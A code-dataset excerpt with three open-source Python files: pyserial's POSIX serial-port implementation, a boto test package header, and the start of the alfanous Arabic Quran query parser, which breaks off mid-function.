repo_name
stringlengths
5
100
path
stringlengths
4
375
copies
stringclasses
991 values
size
stringlengths
4
7
content
stringlengths
666
1M
license
stringclasses
15 values
whaleygeek/punchcard_reader
cardreader/serial/serialposix.py
141
26585
#!/usr/bin/env python # # Python Serial Port Extension for Win32, Linux, BSD, Jython # module for serial IO for POSIX compatible systems, like Linux # see __init__.py # # (C) 2001-2010 Chris Liechti <cliechti@gmx.net> # this is distributed under a free software license, see license.txt # # parts based on code from Grant B. Edwards <grante@visi.com>: # ftp://ftp.visi.com/users/grante/python/PosixSerial.py # # references: http://www.easysw.com/~mike/serial/serial.html import sys, os, fcntl, termios, struct, select, errno, time from serial.serialutil import * # Do check the Python version as some constants have moved. if (sys.hexversion < 0x020100f0): import TERMIOS else: TERMIOS = termios if (sys.hexversion < 0x020200f0): import FCNTL else: FCNTL = fcntl # try to detect the OS so that a device can be selected... # this code block should supply a device() and set_special_baudrate() function # for the platform plat = sys.platform.lower() if plat[:5] == 'linux': # Linux (confirmed) def device(port): return '/dev/ttyS%d' % port TCGETS2 = 0x802C542A TCSETS2 = 0x402C542B BOTHER = 0o010000 def set_special_baudrate(port, baudrate): # right size is 44 on x86_64, allow for some growth import array buf = array.array('i', [0] * 64) try: # get serial_struct FCNTL.ioctl(port.fd, TCGETS2, buf) # set custom speed buf[2] &= ~TERMIOS.CBAUD buf[2] |= BOTHER buf[9] = buf[10] = baudrate # set serial_struct res = FCNTL.ioctl(port.fd, TCSETS2, buf) except IOError, e: raise ValueError('Failed to set custom baud rate (%s): %s' % (baudrate, e)) baudrate_constants = { 0: 0000000, # hang up 50: 0000001, 75: 0000002, 110: 0000003, 134: 0000004, 150: 0000005, 200: 0000006, 300: 0000007, 600: 0000010, 1200: 0000011, 1800: 0000012, 2400: 0000013, 4800: 0000014, 9600: 0000015, 19200: 0000016, 38400: 0000017, 57600: 0010001, 115200: 0010002, 230400: 0010003, 460800: 0010004, 500000: 0010005, 576000: 0010006, 921600: 0010007, 1000000: 0010010, 1152000: 0010011, 1500000: 0010012, 2000000: 0010013, 
2500000: 0010014, 3000000: 0010015, 3500000: 0010016, 4000000: 0010017 } elif plat == 'cygwin': # cygwin/win32 (confirmed) def device(port): return '/dev/com%d' % (port + 1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = { 128000: 0x01003, 256000: 0x01005, 500000: 0x01007, 576000: 0x01008, 921600: 0x01009, 1000000: 0x0100a, 1152000: 0x0100b, 1500000: 0x0100c, 2000000: 0x0100d, 2500000: 0x0100e, 3000000: 0x0100f } elif plat[:7] == 'openbsd': # OpenBSD def device(port): return '/dev/cua%02d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'bsd' or \ plat[:7] == 'freebsd': def device(port): return '/dev/cuad%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:6] == 'darwin': # OS X version = os.uname()[2].split('.') # Tiger or above can support arbitrary serial speeds if int(version[0]) >= 8: def set_special_baudrate(port, baudrate): # use IOKit-specific call to set up high speeds import array, fcntl buf = array.array('i', [baudrate]) IOSSIOSPEED = 0x80045402 #_IOW('T', 2, speed_t) fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1) else: # version < 8 def set_special_baudrate(port, baudrate): raise ValueError("baud rate not supported") def device(port): return '/dev/cuad%d' % port baudrate_constants = {} elif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk def device(port): return '/dev/dty%02d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:4] == 'irix': # IRIX (partially tested) def device(port): return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control def 
set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:2] == 'hp': # HP-UX (not tested) def device(port): return '/dev/tty%dp0' % (port+1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:5] == 'sunos': # Solaris/SunOS (confirmed) def device(port): return '/dev/tty%c' % (ord('a')+port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'aix': # AIX def device(port): return '/dev/tty%d' % (port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} else: # platform detection has failed... sys.stderr.write("""\ don't know how to number ttys on this system. ! Use an explicit path (eg /dev/ttyS1) or send this information to ! the author of this module: sys.platform = %r os.name = %r serialposix.py version = %s also add the device name of the serial port and where the counting starts for the first serial port. e.g. 'first serial port: /dev/ttyS0' and with a bit luck you can get this module running... """ % (sys.platform, os.name, VERSION)) # no exception, just continue with a brave attempt to build a device name # even if the device name is not correct for the platform it has chances # to work using a string with the real device name as port parameter. def device(portum): return '/dev/ttyS%d' % portnum def set_special_baudrate(port, baudrate): raise SerialException("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} #~ raise Exception, "this module does not run on this platform, sorry." # whats up with "aix", "beos", .... # they should work, just need to know the device names. 
# load some constants for later use. # try to use values from TERMIOS, use defaults from linux otherwise TIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415 TIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416 TIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417 TIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418 #TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001 TIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002 TIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004 #TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008 #TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010 TIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020 TIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040 TIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080 TIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100 TIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR TIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG #TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000 #TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000 if hasattr(TERMIOS, 'TIOCINQ'): TIOCINQ = TERMIOS.TIOCINQ else: TIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B TIOCOUTQ = hasattr(TERMIOS, 'TIOCOUTQ') and TERMIOS.TIOCOUTQ or 0x5411 TIOCM_zero_str = struct.pack('I', 0) TIOCM_RTS_str = struct.pack('I', TIOCM_RTS) TIOCM_DTR_str = struct.pack('I', TIOCM_DTR) TIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427 TIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428 class PosixSerial(SerialBase): """Serial port class POSIX implementation. Serial port configuration is done with termios and fcntl. 
Runs on Linux and many other Un*x like systems.""" def open(self): """Open port with current settings. This may throw a SerialException if the port cannot be opened.""" if self._port is None: raise SerialException("Port must be configured before it can be used.") if self._isOpen: raise SerialException("Port is already open.") self.fd = None # open try: self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK) except IOError, msg: self.fd = None raise SerialException(msg.errno, "could not open port %s: %s" % (self._port, msg)) #~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking try: self._reconfigurePort() except: try: os.close(self.fd) except: # ignore any exception when closing the port # also to keep original exception that happened when setting up pass self.fd = None raise else: self._isOpen = True self.flushInput() def _reconfigurePort(self): """Set communication parameters on opened port.""" if self.fd is None: raise SerialException("Can only operate on a valid file descriptor") custom_baud = None vmin = vtime = 0 # timeout is done via select if self._interCharTimeout is not None: vmin = 1 vtime = int(self._interCharTimeout * 10) try: orig_attr = termios.tcgetattr(self.fd) iflag, oflag, cflag, lflag, ispeed, ospeed, cc = orig_attr except termios.error, msg: # if a port is nonexistent but has a /dev file, it'll fail here raise SerialException("Could not configure port: %s" % msg) # set up raw mode / no echo / binary cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD) lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL| TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk if hasattr(TERMIOS, flag): lflag &= ~getattr(TERMIOS, flag) oflag &= ~(TERMIOS.OPOST) iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK) if hasattr(TERMIOS, 'IUCLC'): iflag &= ~TERMIOS.IUCLC if hasattr(TERMIOS, 'PARMRK'): iflag &= ~TERMIOS.PARMRK # setup baud rate try: ispeed = ospeed = 
getattr(TERMIOS, 'B%s' % (self._baudrate)) except AttributeError: try: ispeed = ospeed = baudrate_constants[self._baudrate] except KeyError: #~ raise ValueError('Invalid baud rate: %r' % self._baudrate) # may need custom baud rate, it isn't in our list. ispeed = ospeed = getattr(TERMIOS, 'B38400') try: custom_baud = int(self._baudrate) # store for later except ValueError: raise ValueError('Invalid baud rate: %r' % self._baudrate) else: if custom_baud < 0: raise ValueError('Invalid baud rate: %r' % self._baudrate) # setup char len cflag &= ~TERMIOS.CSIZE if self._bytesize == 8: cflag |= TERMIOS.CS8 elif self._bytesize == 7: cflag |= TERMIOS.CS7 elif self._bytesize == 6: cflag |= TERMIOS.CS6 elif self._bytesize == 5: cflag |= TERMIOS.CS5 else: raise ValueError('Invalid char len: %r' % self._bytesize) # setup stopbits if self._stopbits == STOPBITS_ONE: cflag &= ~(TERMIOS.CSTOPB) elif self._stopbits == STOPBITS_ONE_POINT_FIVE: cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. there is no POSIX support for 1.5 elif self._stopbits == STOPBITS_TWO: cflag |= (TERMIOS.CSTOPB) else: raise ValueError('Invalid stop bit specification: %r' % self._stopbits) # setup parity iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP) if self._parity == PARITY_NONE: cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD) elif self._parity == PARITY_EVEN: cflag &= ~(TERMIOS.PARODD) cflag |= (TERMIOS.PARENB) elif self._parity == PARITY_ODD: cflag |= (TERMIOS.PARENB|TERMIOS.PARODD) else: raise ValueError('Invalid parity: %r' % self._parity) # setup flow control # xonxoff if hasattr(TERMIOS, 'IXANY'): if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY) else: if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF) # rtscts if hasattr(TERMIOS, 'CRTSCTS'): if self._rtscts: cflag |= (TERMIOS.CRTSCTS) else: cflag &= ~(TERMIOS.CRTSCTS) elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant 
name if self._rtscts: cflag |= (TERMIOS.CNEW_RTSCTS) else: cflag &= ~(TERMIOS.CNEW_RTSCTS) # XXX should there be a warning if setting up rtscts (and xonxoff etc) fails?? # buffer # vmin "minimal number of characters to be read. = for non blocking" if vmin < 0 or vmin > 255: raise ValueError('Invalid vmin: %r ' % vmin) cc[TERMIOS.VMIN] = vmin # vtime if vtime < 0 or vtime > 255: raise ValueError('Invalid vtime: %r' % vtime) cc[TERMIOS.VTIME] = vtime # activate settings if [iflag, oflag, cflag, lflag, ispeed, ospeed, cc] != orig_attr: termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]) # apply custom baud rate, if any if custom_baud is not None: set_special_baudrate(self, custom_baud) def close(self): """Close port""" if self._isOpen: if self.fd is not None: os.close(self.fd) self.fd = None self._isOpen = False def makeDeviceName(self, port): return device(port) # - - - - - - - - - - - - - - - - - - - - - - - - def inWaiting(self): """Return the number of characters currently in the input buffer.""" #~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str) s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str) return struct.unpack('I',s)[0] # select based implementation, proved to work on many systems def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if not self._isOpen: raise portNotOpenError read = bytearray() while len(read) < size: try: ready,_,_ = select.select([self.fd],[],[], self._timeout) # If select was used with a timeout, and the timeout occurs, it # returns with empty lists -> thus abort read operation. # For timeout == 0 (non-blocking operation) also abort when there # is nothing to read. 
if not ready: break # timeout buf = os.read(self.fd, size-len(read)) # read should always return some data as select reported it was # ready to read when we get to this point. if not buf: # Disconnected devices, at least on Linux, show the # behavior that they are always ready to read immediately # but reading returns nothing. raise SerialException('device reports readiness to read but returned no data (device disconnected or multiple access on port?)') read.extend(buf) except select.error, e: # ignore EAGAIN errors. all other errors are shown # see also http://www.python.org/dev/peps/pep-3151/#select if e[0] != errno.EAGAIN: raise SerialException('read failed: %s' % (e,)) except OSError, e: # ignore EAGAIN errors. all other errors are shown if e.errno != errno.EAGAIN: raise SerialException('read failed: %s' % (e,)) return bytes(read) def write(self, data): """Output the given string over the serial port.""" if not self._isOpen: raise portNotOpenError d = to_bytes(data) tx_len = len(d) if self._writeTimeout is not None and self._writeTimeout > 0: timeout = time.time() + self._writeTimeout else: timeout = None while tx_len > 0: try: n = os.write(self.fd, d) if timeout: # when timeout is set, use select to wait for being ready # with the time left as timeout timeleft = timeout - time.time() if timeleft < 0: raise writeTimeoutError _, ready, _ = select.select([], [self.fd], [], timeleft) if not ready: raise writeTimeoutError else: # wait for write operation _, ready, _ = select.select([], [self.fd], [], None) if not ready: raise SerialException('write failed (select)') d = d[n:] tx_len -= n except OSError, v: if v.errno != errno.EAGAIN: raise SerialException('write failed: %s' % (v,)) return len(data) def flush(self): """Flush of file like objects. 
In this case, wait until all data is written.""" self.drainOutput() def flushInput(self): """Clear input buffer, discarding all that is in the buffer.""" if not self._isOpen: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCIFLUSH) def flushOutput(self): """Clear output buffer, aborting the current output and discarding all that is in the buffer.""" if not self._isOpen: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCOFLUSH) def sendBreak(self, duration=0.25): """Send break condition. Timed, returns to idle state after given duration.""" if not self._isOpen: raise portNotOpenError termios.tcsendbreak(self.fd, int(duration/0.25)) def setBreak(self, level=1): """Set break: Controls TXD. When active, no transmitting is possible.""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCSBRK) else: fcntl.ioctl(self.fd, TIOCCBRK) def setRTS(self, level=1): """Set terminal status line: Request To Send""" if not self._isOpen: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str) def setDTR(self, level=1): """Set terminal status line: Data Terminal Ready""" if not self._isOpen: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str) def getCTS(self): """Read terminal status line: Clear To Send""" if not self._isOpen: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CTS != 0 def getDSR(self): """Read terminal status line: Data Set Ready""" if not self._isOpen: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_DSR != 0 def getRI(self): """Read terminal status line: Ring Indicator""" if not self._isOpen: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_RI != 0 def getCD(self): """Read terminal 
status line: Carrier Detect""" if not self._isOpen: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CD != 0 # - - platform specific - - - - def outWaiting(self): """Return the number of characters currently in the output buffer.""" #~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str) s = fcntl.ioctl(self.fd, TIOCOUTQ, TIOCM_zero_str) return struct.unpack('I',s)[0] def drainOutput(self): """internal - not portable!""" if not self._isOpen: raise portNotOpenError termios.tcdrain(self.fd) def nonblocking(self): """internal - not portable!""" if not self._isOpen: raise portNotOpenError fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK) def fileno(self): """\ For easier use of the serial port instance with select. WARNING: this function is not portable to different platforms! """ if not self._isOpen: raise portNotOpenError return self.fd def setXON(self, level=True): """\ Manually control flow - when software flow control is enabled. This will send XON (true) and XOFF (false) to the other device. WARNING: this function is not portable to different platforms! """ if not self.hComPort: raise portNotOpenError if enable: termios.tcflow(self.fd, TERMIOS.TCION) else: termios.tcflow(self.fd, TERMIOS.TCIOFF) def flowControlOut(self, enable): """\ Manually control flow of outgoing data - when hardware or software flow control is enabled. WARNING: this function is not portable to different platforms! """ if not self._isOpen: raise portNotOpenError if enable: termios.tcflow(self.fd, TERMIOS.TCOON) else: termios.tcflow(self.fd, TERMIOS.TCOOFF) # assemble Serial class with the platform specifc implementation and the base # for file-like behavior. 
for Python 2.6 and newer, that provide the new I/O # library, derrive from io.RawIOBase try: import io except ImportError: # classic version with our own file-like emulation class Serial(PosixSerial, FileLike): pass else: # io library present class Serial(PosixSerial, io.RawIOBase): pass class PosixPollSerial(Serial): """poll based read implementation. not all systems support poll properly. however this one has better handling of errors, such as a device disconnecting while it's in use (e.g. USB-serial unplugged)""" def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() poll = select.poll() poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL) if size > 0: while len(read) < size: # print "\tread(): size",size, "have", len(read) #debug # wait until device becomes ready to read (or something fails) for fd, event in poll.poll(self._timeout*1000): if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL): raise SerialException('device reports error (poll)') # we don't care if it is select.POLLIN or timeout, that's # handled below buf = os.read(self.fd, size - len(read)) read.extend(buf) if ((self._timeout is not None and self._timeout >= 0) or (self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf: break # early abort on timeout return bytes(read) if __name__ == '__main__': s = Serial(0, baudrate=19200, # baud rate bytesize=EIGHTBITS, # number of data bits parity=PARITY_EVEN, # enable parity checking stopbits=STOPBITS_ONE, # number of stop bits timeout=3, # set a timeout value, None for waiting forever xonxoff=0, # enable software flow control rtscts=0, # enable RTS/CTS flow control ) s.setRTS(1) s.setDTR(1) s.flushInput() s.flushOutput() s.write('hello') sys.stdout.write('%r\n' % s.read(5)) 
sys.stdout.write('%s\n' % s.inWaiting()) del s
mit
chenc10/Spark-PAF
dist/ec2/lib/boto-2.34.0/tests/integration/sqs/__init__.py
761
1104
# Copyright (c) 2006-2011 Mitch Garnaat http://garnaat.org/ # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE.
apache-2.0
muslih/alfanous
src/alfanous/QueryProcessing.py
2
27994
#!/usr/bin/env python2 # coding: utf-8 # # Copyright (C) 2009-2012 Assem Chelli <assem.ch [at] gmail.com> # # This program is free software: you can redistribute it and/or modify # # it under the terms of the GNU Affero General Public License as published # # by the Free Software Foundation, either version 3 of the License, or # # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # # but WITHOUT ANY WARRANTY; without even the implied warranty of # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # # along with this program. If not, see <http://www.gnu.org/licenses/>. """ This module contains customized query parsers for Arabic and Quran. TODO Buckwalter/Other codings Search {bw! kutubo } TODO Upgrading Tuple Search to Embeded Query Search {1! word="foo"} TODO Smart-search : take the optimal choice with NLP! TODO Synonyme-Antonyme Upgrade to related search {syn! 
fire } FIXME multifields """ from pyparsing import printables, alphanums from pyparsing import ZeroOrMore, OneOrMore from pyparsing import Group, Combine, Suppress, Optional, FollowedBy from pyparsing import Literal, CharsNotIn, Word, Keyword from pyparsing import Empty, White, Forward, QuotedString from pyparsing import StringEnd # , ParserElement from alfanous.Support.whoosh.qparser import QueryParser # , MultifieldParser from alfanous.Support.whoosh.query import Term, MultiTerm from alfanous.Support.whoosh.query import Wildcard as whoosh_Wildcard from alfanous.Support.whoosh.query import Prefix as whoosh_Prefix from alfanous.Support.whoosh.query import Or, NullQuery, Every , And #### Importing dynamically compiled resources # # Importing synonyms dictionary try: from alfanous.dynamic_resources.synonymes_dyn import syndict except ImportError: syndict = {} # # Importing field names arabic-to-english mapping dictionary try: from alfanous.dynamic_resources.arabicnames_dyn import ara2eng_names except ImportError: ara2eng_names = {} # # Importing word properties dictionary try: from alfanous.dynamic_resources.word_props_dyn import worddict except ImportError: worddict = {} # # Importing derivations dictionary try: from alfanous.dynamic_resources.derivations_dyn import derivedict except ImportError: derivedict = {} # # Importing antonyms dictionary try: from alfanous.dynamic_resources.antonymes_dyn import antdict except ImportError: antdict = {} from alfanous.Indexing import QseDocIndex from alfanous.Exceptions import FeedBack # , NotImplemented from alfanous.TextProcessing import QArabicSymbolsFilter, unicode_ from alfanous.Misc import LOCATE, FIND, FILTER_DOUBLES FEEDBACK = True def _make_arabic_parser(): escapechar = "//" # wordchars = printables # for specialchar in '*?^():"{}[] ' + escapechar: # wordchars = wordchars.replace(specialchar, "") # wordtext = Word(wordchars) alephba = u""" abcdefghijklmnopqrstuvwxyz_ األآإـتنمكطدجحخهعغفقثصضشسيبئءؤرىةوزظذ """ wordtext = 
CharsNotIn( u'//*؟^():"{}[]$><%~#،,\' +-|' ) escape = Suppress( escapechar ) \ + ( Word( printables, exact = 1 ) | White( exact = 1 ) ) wordtoken = Combine( OneOrMore( wordtext | escape ) ) # A plain old word. plainWord = Group( wordtoken ).setResultsName( "Word" ) # A wildcard word containing * or ?. wildchars = Word( u"؟?*" ) # Start with word chars and then have wild chars mixed in wildmixed = wordtoken + OneOrMore( wildchars + Optional( wordtoken ) ) # Or, start with wildchars, and then either a mixture of word and wild chars # , or the next token wildstart = wildchars \ + ( OneOrMore( wordtoken + Optional( wildchars ) ) \ | FollowedBy( White() \ | StringEnd() ) ) wildcard = Group( Combine( wildmixed | wildstart ) ).setResultsName( "Wildcard" ) # A range of terms startfence = Literal( "[" ) endfence = Literal( "]" ) rangeitem = QuotedString( '"' ) | wordtoken to = Keyword( u"الى" ) \ | Keyword( u"إلى" ) \ | Keyword( "To" ) \ | Keyword( "to" ) \ | Keyword( "TO" ) openstartrange = Group( Empty() ) \ + Suppress( to + White() ) \ + Group( rangeitem ) openendrange = Group( rangeitem ) \ + Suppress( White() + to ) \ + Group( Empty() ) normalrange = Group( rangeitem ) \ + Suppress( White() + to + White() ) \ + Group( rangeitem ) range = Group( startfence \ + ( normalrange | openstartrange | openendrange ) \ + endfence ).setResultsName( "Range" ) # synonyms syn_symbol = Literal( "~" ) synonym = Group( syn_symbol + wordtoken ).setResultsName( "Synonyms" ) # antonyms ant_symbol = Literal( "#" ) antonym = Group( ant_symbol + wordtoken ).setResultsName( "Antonyms" ) # derivation level 1,2 derive_symbole = Literal( u"<" ) | Literal( u">" ) derivation = Group( OneOrMore( derive_symbole ) + wordtoken ).setResultsName( "Derivation" ) # spellerrors # spellerrors=Group(QuotedString('\'')).setResultsName("Errors") spellerrors_symbole = Literal( u"%" ) spellerrors = Group( spellerrors_symbole + wordtoken ).setResultsName( "SpellErrors" ) # shakl:must uplevel to boostable 
tashkil_symbol = Literal( "'" ) tashkil = Group( tashkil_symbol + \ ZeroOrMore( wordtoken | White() ) + \ tashkil_symbol ).setResultsName( "Tashkil" ) # tuple search (root,pattern,type) starttuple = Literal( "{" ) endtuple = Literal( "}" ) bettuple = Literal( u"،" ) | Literal( "," ) wordtuple = Group( Optional( wordtoken ) ) tuple = Group( starttuple + \ wordtuple + \ ZeroOrMore( bettuple + wordtuple ) + \ endtuple ).setResultsName( "Tuple" ) # A word-like thing generalWord = range | wildcard | plainWord | tuple | antonym | synonym | \ derivation | tashkil | spellerrors # A quoted phrase quotedPhrase = Group( QuotedString( '"' ) ).setResultsName( "Quotes" ) expression = Forward() # Parentheses can enclose (group) any expression parenthetical = Group( ( Suppress( "(" ) + expression + Suppress( ")" ) ) ).setResultsName( "Group" ) boostableUnit = generalWord | quotedPhrase boostedUnit = Group( boostableUnit + \ Suppress( "^" ) + \ Word( "0123456789", ".0123456789" ) ).setResultsName( "Boost" ) # The user can flag that a parenthetical group, quoted phrase, or word # should be searched in a particular field by prepending 'fn:', where fn is # the name of the field. fieldableUnit = parenthetical | boostedUnit | boostableUnit fieldedUnit = Group( ( Word( alephba + "_" ) | Word( alphanums + "_" ) ) + \ Suppress( ':' ) + \ fieldableUnit ).setResultsName( "Field" ) # Units of content unit = fieldedUnit | fieldableUnit # A unit may be "not"-ed. 
operatorNot = Group( Suppress( Keyword( u"ليس" ) | Keyword( u"NOT" ) ) + \ Suppress( White() ) + \ unit ).setResultsName( "Not" ) generalUnit = operatorNot | unit andToken = Keyword( u"و" ) | Keyword( u"AND" ) orToken = Keyword( u"أو" ) | Keyword( u"او" ) | Keyword( u"OR" ) andNotToken = Keyword( u"وليس" ) | Keyword( u"ANDNOT" ) operatorAnd = Group( ( generalUnit + \ Suppress( White() ) + \ Suppress( andToken ) + \ Suppress( White() ) + \ expression ) | \ ( generalUnit + \ Suppress( Literal( u"+" ) ) + \ expression ) ).setResultsName( "And" ) operatorOr = Group( ( generalUnit + \ Suppress( White() ) + \ Suppress( orToken ) + \ Suppress( White() ) + \ expression ) | \ ( generalUnit + \ Suppress( Literal( u"|" ) ) + \ expression ) ).setResultsName( "Or" ) operatorAndNot = Group( ( unit + \ Suppress( White() ) + \ Suppress( andNotToken ) + \ Suppress( White() ) + \ expression ) | \ ( unit + \ Suppress( Literal( u"-" ) ) + \ expression ) ).setResultsName( "AndNot" ) expression << ( OneOrMore( operatorAnd | operatorOr | operatorAndNot | \ generalUnit | Suppress( White() ) ) | Empty() ) toplevel = Group( expression ).setResultsName( "Toplevel" ) + StringEnd() return toplevel.parseString ARABIC_PARSER_FN = _make_arabic_parser() class StandardParser( QueryParser ): # def __init__( self, schema, mainfield, otherfields, termclass = Term ): super( StandardParser, self ).__init__( mainfield, schema = schema, conjunction = Or, termclass = termclass ) class ArabicParser( StandardParser ): """a customized parser that respects Arabic properties""" def __init__( self, schema, mainfield, otherfields = [], termclass = Term, ara2eng = ara2eng_names ): super( ArabicParser, self ).__init__( schema = schema, mainfield = mainfield, otherfields = otherfields, termclass = termclass ) self.parser = ARABIC_PARSER_FN self.ara2eng = ara2eng def _Field( self, node, fieldname ): if self.ara2eng.has_key( node[0] ): name = self.ara2eng[node[0]] else: name = node[0] return self._eval( node[1], name 
